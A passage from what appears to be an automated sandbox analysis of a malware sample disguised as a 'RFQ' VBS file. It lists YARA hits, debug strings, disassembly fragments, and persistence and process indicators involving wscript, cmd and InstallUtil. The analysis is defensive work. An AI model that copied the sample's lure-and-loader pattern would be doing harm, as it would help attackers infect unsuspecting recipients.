                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2046638246.0000000009DB1000.00000004.00000800.00020000.00000000.sdmp, RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2024331201.00000000070D6000.00000004.00000800.00020000.00000000.sdmp, RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2038788534.0000000007B90000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: powershell.pdbUGP source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000000.1751510108.0000000000011000.00000020.00000001.01000000.00000005.sdmp, RFQ_43200046412000086500125.vbs.exe.1.dr
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2045039920.0000000009990000.00000004.08000000.00040000.00000000.sdmp, RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2024331201.0000000006DFD000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: powershell.pdb source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000000.1751510108.0000000000011000.00000020.00000001.01000000.00000005.sdmp, RFQ_43200046412000086500125.vbs.exe.1.dr
                      Source: Binary string: protobuf-net.pdb source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2045039920.0000000009990000.00000004.08000000.00040000.00000000.sdmp, RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2024331201.0000000006DFD000.00000004.00000800.00020000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      Source: Yara matchFile source: 8.2.InstallUtil.exe.4cb0000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.RFQ_43200046412000086500125.vbs.exe.9b70000.17.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.RFQ_43200046412000086500125.vbs.exe.6c521f0.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.RFQ_43200046412000086500125.vbs.exe.9b70000.17.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.RFQ_43200046412000086500125.vbs.exe.6dfde30.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.RFQ_43200046412000086500125.vbs.exe.6dfde30.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.RFQ_43200046412000086500125.vbs.exe.6b01dd0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.RFQ_43200046412000086500125.vbs.exe.67f9d60.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000008.00000002.2076310345.0000000004CB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2045997781.0000000009B70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2011025718.0000000005606000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2024331201.0000000006DFD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2063750110.0000000002541000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2024331201.00000000067F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: RFQ_43200046412000086500125.vbs.exe PID: 7728, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 8184, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeCode function: 3_2_051826BF push eax; ret 3_2_051826D9
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeCode function: 3_2_0518A8F9 push es; ret 3_2_0518A91C
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeCode function: 3_2_0518D347 push edx; retf 3_2_0518D379
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeCode function: 3_2_0518D37B push edx; retf 3_2_0518D379
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeCode function: 3_2_074AB4FA pushfd ; retf 3_2_074AB4FB
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeCode function: 3_2_07CA0CF8 push cs; retf 0007h3_2_07CA0ED6
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeCode function: 3_2_07CA5348 push ebx; retf 0007h3_2_07CA53FE
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeCode function: 3_2_07CA5F49 pushad ; retf 0007h3_2_07CA600E
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeCode function: 3_2_07CA5341 push ebx; retf 0007h3_2_07CA53FE
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeCode function: 3_2_07CA5F50 pushad ; retf 0007h3_2_07CA600E
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeCode function: 3_2_07CA4F38 push eax; retf 0007h3_2_07CA500E
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeCode function: 3_2_07CA4F30 push eax; retf 0007h3_2_07CA500E
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeCode function: 3_2_07CA52D9 push ebx; retf 0007h3_2_07CA5336
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeCode function: 3_2_07CA52E0 push ebx; retf 0007h3_2_07CA5336
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeCode function: 3_2_07CA5278 push edx; retf 0007h3_2_07CA52CE
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeCode function: 3_2_07CA5270 push edx; retf 0007h3_2_07CA52CE
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeCode function: 3_2_07CA1C70 push ds; retf 0007h3_2_07CA1E36
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeCode function: 3_2_0987C0C6 pushfd ; retf 3_2_0987C0C7
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeCode function: 3_2_09876DFD pushfd ; retf 3_2_09876DFE
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeCode function: 3_2_0987E43F pushfd ; retf 3_2_0987E440
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeCode function: 3_2_099333CE push 8B044389h; ret 3_2_099333D8
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeCode function: 3_2_0993331B push 8B044388h; ret 3_2_09933320
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeCode function: 3_2_09A2B924 push ecx; ret 3_2_09A2B925
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeCode function: 3_2_09D951C8 push E8FFFFF8h; iretd 3_2_09D951CD
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeCode function: 3_2_09D96D72 push eax; ret 3_2_09D96D75
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeCode function: 3_2_09D91538 pushad ; iretd 3_2_09D91539
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeCode function: 3_2_09D923BB pushad ; iretd 3_2_09D923BC
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeCode function: 3_2_09D932FD pushad ; iretd 3_2_09D932FE
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeCode function: 3_2_09D9428D pushad ; iretd 3_2_09D9428E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_0099190D push cs; ret 8_2_00991911
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_00994BEB push es; retf 8_2_00994BF7

                      Persistence and Installation Behavior

                      barindex
                      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.logJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOTJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
